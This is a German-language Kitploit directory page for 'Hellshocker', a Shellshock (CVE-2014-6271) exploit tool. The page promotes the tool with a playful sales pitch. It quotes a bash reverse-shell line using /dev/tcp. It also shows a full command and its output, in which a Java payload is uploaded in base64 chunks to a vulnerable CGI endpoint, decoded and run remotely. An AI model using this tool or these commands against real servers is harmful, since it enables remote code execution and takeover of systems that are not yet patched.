Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6271 — Shellshock-Exploit-Skript, das aufgrund seiner Vielseitigkeit in der Lage ist, über beliebige Vektoren hochzuladen und RCE auszuführen. | Kitploit
Tools/GitHubGitHub/0x00-0x00/cve-2014-6271
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHub0x00-0x00/cve-2014-6271

CVE-2014-6271

Shellshock-Exploit-Skript, das aufgrund seiner Vielseitigkeit in der Lage ist, über beliebige Vektoren hochzuladen und RCE auszuführen.

Repository anzeigen
322vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hellshocker 0.1.1

Tool zur Ausnutzung der Shellshock-Sicherheitslücke

Müde von schwachen Shellshock-Exploits oder einfach nur "/bin/bash >& /dev/tcp/IP/port 0>&1" in den Server zu gelangen?

Ja, du musst etwas Komplexeres auf den Server hochladen und ausführen, und das Base64-Kodieren einer riesigen Datei ist unmöglich, damit deine HTTP-Anfrage vom Webserver akzeptiert wird.

Deine Probleme könnten mit diesem Tool ein Ende haben. Es kann dein Payload in Base64 kodieren und in Blöcken von (standardmäßig) 128 Bytes an den Webserver senden. Nachdem es gesendet wurde, wird es decodiert und ausgeführt.

"Wow", sagst du, "Aber ich habe kein PHP, ich brauche etwas für Java." Kein Problem, sage ich, dieses Tool ist hochgradig anpassbar.

Schau dir das an:

root@kitploit:~
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.

Dann wurde dein Payload erfolgreich übertragen und ausgeführt. Cool, oder? Ja, das ist es.

Tool herunterladen